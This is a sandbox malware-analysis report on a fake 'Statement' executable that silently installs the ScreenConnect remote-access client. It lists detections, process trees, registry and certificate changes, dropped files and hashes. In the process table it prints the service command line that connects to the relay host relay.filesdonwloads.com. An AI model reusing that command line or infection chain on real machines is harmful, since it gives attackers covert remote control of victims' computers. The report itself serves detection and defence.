File name:

Statement7626660841.exe

Full analysis: https://app.any.run/tasks/56f312d0-a9fb-472a-894e-48aa1e55dc84
Verdict: Malicious activity
Analysis date: April 15, 2025, 19:39:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
screenconnect
rmm-tool
remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

E8347DFDAB014FB1F7FA21C953524E77

SHA1:

0608420D34C7158E8E13CD273A864211B1FAB454

SHA256:

FBA59A93162547F28CDAEF8962BCD25D368A8DFB1740364F2044DE886055C0EB

SSDEEP:

6144:SlJSL048g5bElqSjrmbM9EyZcU3NTcJOG+lFqiQ5AvV0:SJ483ZcEcMG+ldQ5MV0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.ClientService.exe (PID: 8052)
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Statement7626660841.exe (PID: 4756)
      • dfsvc.exe (PID: 4880)
    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 4880)
      • ScreenConnect.WindowsClient.exe (PID: 7888)
      • ScreenConnect.ClientService.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8052)
      • ScreenConnect.WindowsClient.exe (PID: 8120)
      • ScreenConnect.WindowsClient.exe (PID: 616)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 4880)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 4880)
    • Reads the date of Windows installation

      • dfsvc.exe (PID: 4880)
      • ScreenConnect.WindowsClient.exe (PID: 7888)
    • Executes as Windows Service

      • ScreenConnect.ClientService.exe (PID: 8052)
    • SCREENCONNECT mutex has been found

      • ScreenConnect.ClientService.exe (PID: 8052)
    • Screenconnect has been detected

      • ScreenConnect.ClientService.exe (PID: 8052)
    • Creates or modifies Windows services

      • ScreenConnect.ClientService.exe (PID: 8052)
    • Connects to unusual port

      • ScreenConnect.ClientService.exe (PID: 8052)
    • Potential Corporate Privacy Violation

      • ScreenConnect.ClientService.exe (PID: 8052)
  • INFO

    • Checks supported languages

      • Statement7626660841.exe (PID: 4756)
      • dfsvc.exe (PID: 4880)
      • ScreenConnect.WindowsClient.exe (PID: 7888)
      • ScreenConnect.ClientService.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8052)
      • ScreenConnect.WindowsClient.exe (PID: 8120)
      • ScreenConnect.WindowsClient.exe (PID: 616)
    • Reads the machine GUID from the registry

      • Statement7626660841.exe (PID: 4756)
      • dfsvc.exe (PID: 4880)
      • ScreenConnect.WindowsClient.exe (PID: 7888)
      • ScreenConnect.ClientService.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8052)
      • ScreenConnect.WindowsClient.exe (PID: 8120)
      • ScreenConnect.WindowsClient.exe (PID: 616)
    • Reads the computer name

      • Statement7626660841.exe (PID: 4756)
      • dfsvc.exe (PID: 4880)
      • ScreenConnect.WindowsClient.exe (PID: 7888)
      • ScreenConnect.ClientService.exe (PID: 8008)
      • ScreenConnect.ClientService.exe (PID: 8052)
      • ScreenConnect.WindowsClient.exe (PID: 8120)
      • ScreenConnect.WindowsClient.exe (PID: 616)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 4880)
      • ScreenConnect.WindowsClient.exe (PID: 7888)
      • ScreenConnect.ClientService.exe (PID: 8052)
    • Reads Environment values

      • dfsvc.exe (PID: 4880)
    • Disables trace logs

      • dfsvc.exe (PID: 4880)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 4880)
    • Checks proxy server information

      • dfsvc.exe (PID: 4880)
    • Reads the software policy settings

      • dfsvc.exe (PID: 4880)
    • Process checks computer location settings

      • ScreenConnect.WindowsClient.exe (PID: 7888)
      • dfsvc.exe (PID: 4880)
    • SCREENCONNECT has been detected

      • ScreenConnect.ClientService.exe (PID: 8052)
    • Reads CPU info

      • ScreenConnect.WindowsClient.exe (PID: 616)
    • Manual execution by a user

      • Taskmgr.exe (PID: 2244)
      • Taskmgr.exe (PID: 900)
    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 900)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:07 18:19:28+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.4
CodeSize: 250880
InitializedDataSize: 53760
UninitializedDataSize: -
EntryPoint: 0x1532
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
139
Monitored processes
11
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start statement7626660841.exe no specs dfsvc.exe sppextcomobj.exe no specs slui.exe no specs screenconnect.windowsclient.exe no specs screenconnect.clientservice.exe #SCREENCONNECT screenconnect.clientservice.exe screenconnect.windowsclient.exe no specs screenconnect.windowsclient.exe no specs taskmgr.exe no specs taskmgr.exe

Process information

PID
CMD
Path
Indicators
Parent process
616"C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.WindowsClient.exe" "RunRole" "67325195-82e3-4a1d-a2eb-038cb64225c4" "System"C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exe
User:
SYSTEM
Company:
ScreenConnect Software
Integrity Level:
SYSTEM
Description:
ScreenConnect Client
Version:
25.1.10.9197
Modules
Images
c:\users\admin\appdata\local\apps\2.0\jnqbhap7.7qg\n23gd1aj.w4x\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
900"C:\WINDOWS\system32\taskmgr.exe" /4C:\Windows\System32\Taskmgr.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Manager
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2244"C:\WINDOWS\system32\taskmgr.exe" /4C:\Windows\System32\Taskmgr.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Manager
Exit code:
3221226540
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\windows\system32\ntdll.dll
4756"C:\Users\admin\AppData\Local\Temp\Statement7626660841.exe" C:\Users\admin\AppData\Local\Temp\Statement7626660841.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\statement7626660841.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
4880"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Statement7626660841.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
7388C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7460"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7888"C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.WindowsClient.exedfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Exit code:
0
Version:
25.1.10.9197
Modules
Images
c:\users\admin\appdata\local\apps\2.0\jnqbhap7.7qg\n23gd1aj.w4x\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
8008"C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=relay.filesdonwloads.com&p=8041&s=b95f6575-58de-48f0-a18a-564f91c37abe&k=BgIAAACkAABSU0ExAAgAAAEAAQDxZEGVjK%2bvcVxSNAHasZU%2f4w%2bx4pVY1xTpI5DUuhIarzJrofBfnvqeVUjxracDi5C0jFKLQadJG2S0VvTYD8H1taq00HBSMyCIrk4fzqizL5BcsUShxKnYWP8sNZjHeDf8OrhB8s%2bwOnsJQykJmx94WjvcKU%2bX2DRB7Mhe%2bTxFixUmr4wjsUcgaL%2fWbtFhPRHnYbKwNyYE7%2fzUfTeveuiz%2fUNx%2f0P8Jv5UUmDCQ47TVvk1ycMdoEkYl5dMCgDWhdSdV2SGsh8%2f8vEA4Wh5I8PFiTExz93KXFRfbYKRxz%2bLUnOXWcNvRX2l9W8L26f4O0e1n1WRv%2fdT29nMj4gRa%2bLM&r=&i=HomeTrust-703611" "5"C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
25.1.10.9197
Modules
Images
c:\users\admin\appdata\local\apps\2.0\jnqbhap7.7qg\n23gd1aj.w4x\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
8052"C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=relay.filesdonwloads.com&p=8041&s=b95f6575-58de-48f0-a18a-564f91c37abe&k=BgIAAACkAABSU0ExAAgAAAEAAQDxZEGVjK%2bvcVxSNAHasZU%2f4w%2bx4pVY1xTpI5DUuhIarzJrofBfnvqeVUjxracDi5C0jFKLQadJG2S0VvTYD8H1taq00HBSMyCIrk4fzqizL5BcsUShxKnYWP8sNZjHeDf8OrhB8s%2bwOnsJQykJmx94WjvcKU%2bX2DRB7Mhe%2bTxFixUmr4wjsUcgaL%2fWbtFhPRHnYbKwNyYE7%2fzUfTeveuiz%2fUNx%2f0P8Jv5UUmDCQ47TVvk1ycMdoEkYl5dMCgDWhdSdV2SGsh8%2f8vEA4Wh5I8PFiTExz93KXFRfbYKRxz%2bLUnOXWcNvRX2l9W8L26f4O0e1n1WRv%2fdT29nMj4gRa%2bLM&r=&i=HomeTrust-703611" "5"C:\Users\admin\AppData\Local\Apps\2.0\JNQBHAP7.7QG\N23GD1AJ.W4X\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\ScreenConnect.ClientService.exe
services.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
25.1.10.9197
Modules
Images
c:\users\admin\appdata\local\apps\2.0\jnqbhap7.7qg\n23gd1aj.w4x\scre..tion_25b0fbb6ef7eb094_0019.0001_ab688c4a2d76ce36\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\msvcrt.dll
Total events
10 623
Read events
10 421
Write events
169
Delete events
33

Modification events

(PID) Process:(4756) Statement7626660841.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(4756) Statement7626660841.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(4756) Statement7626660841.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(4756) Statement7626660841.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(4880) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
C4Q9LQ5C69M89CN1P8TXE975
(PID) Process:(4880) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
C4Q9LQ5C69M89CN1P8TXE975
(PID) Process:(4880) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(4880) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
JNQBHAP77QGN23GD1AJW4XZ9
(PID) Process:(4880) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
K1VN2LD2ENR6R3M8VT98BW63
(PID) Process:(4880) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
16
Suspicious files
18
Text files
28
Unknown types
0

Dropped files

PID
Process
Filename
Type
4880dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
4880dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\83H1VH5A.XDY\30OBABAZ.DOD\ScreenConnect.WindowsClient.exe.manifestxml
MD5:5259D3B040AD978D0D23AC1E1698CBCD
SHA256:92DDF8B23746703A24F5E1FB6B9F087E98E68116AEC5DE9174D2662E53C1505E
4880dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\83H1VH5A.XDY\30OBABAZ.DOD\ScreenConnect.WindowsBackstageShell.exeexecutable
MD5:5259A1B61B61FD188703D6489BD76719
SHA256:47427301C931E9A61C7AB8CEF218CE904B5E3653230B1E83B8B1BE50D230862F
4880dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\0G398K1T.J3A\VL52THKQ.BW6.applicationxml
MD5:4C0A75B1B969AA5B9A8DDA59446B4DD9
SHA256:E53C185EE5EC331B54FAACF75F5F085103A68CD156E33D20948B9C47A92B99E4
4880dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:4312835B9B682C3148B57E073EDAD193
SHA256:68CD377C79D3ECA658BB7514F3A2BC6CC0ABA1A6DC0503C7C25E6261430237E1
4880dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:BBE3662B8B338817769386FFBFC49DA5
SHA256:D0095458FE8A94608B9E6587F5F7B50F603F1743C6DED3FE5E1D3CB66373CB32
4880dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:EFD5C2D91D82C617953A07D4167B2C52
SHA256:B0458F8CD6C05DB13A726DFC5677566AF7564DDAE88FB4D7E8E899D6F99BAB43
4880dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:752DDCEF21013B5EBFC1B80D57660435
SHA256:8FEC8E2529935632DCA401ADB67A84AD8D58C675A3BEB57E13CCF3B91D11828D
4880dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\83H1VH5A.XDY\30OBABAZ.DOD\ScreenConnect.ClientService.exeexecutable
MD5:AE94732DDA137A8DC6179F76C9BE4190
SHA256:B89C1D2BC7F274973115868DB48C90740DAB2946C3E7C959A388EDF753B332F8
4880dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\83H1VH5A.XDY\30OBABAZ.DOD\ScreenConnect.WindowsFileManager.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
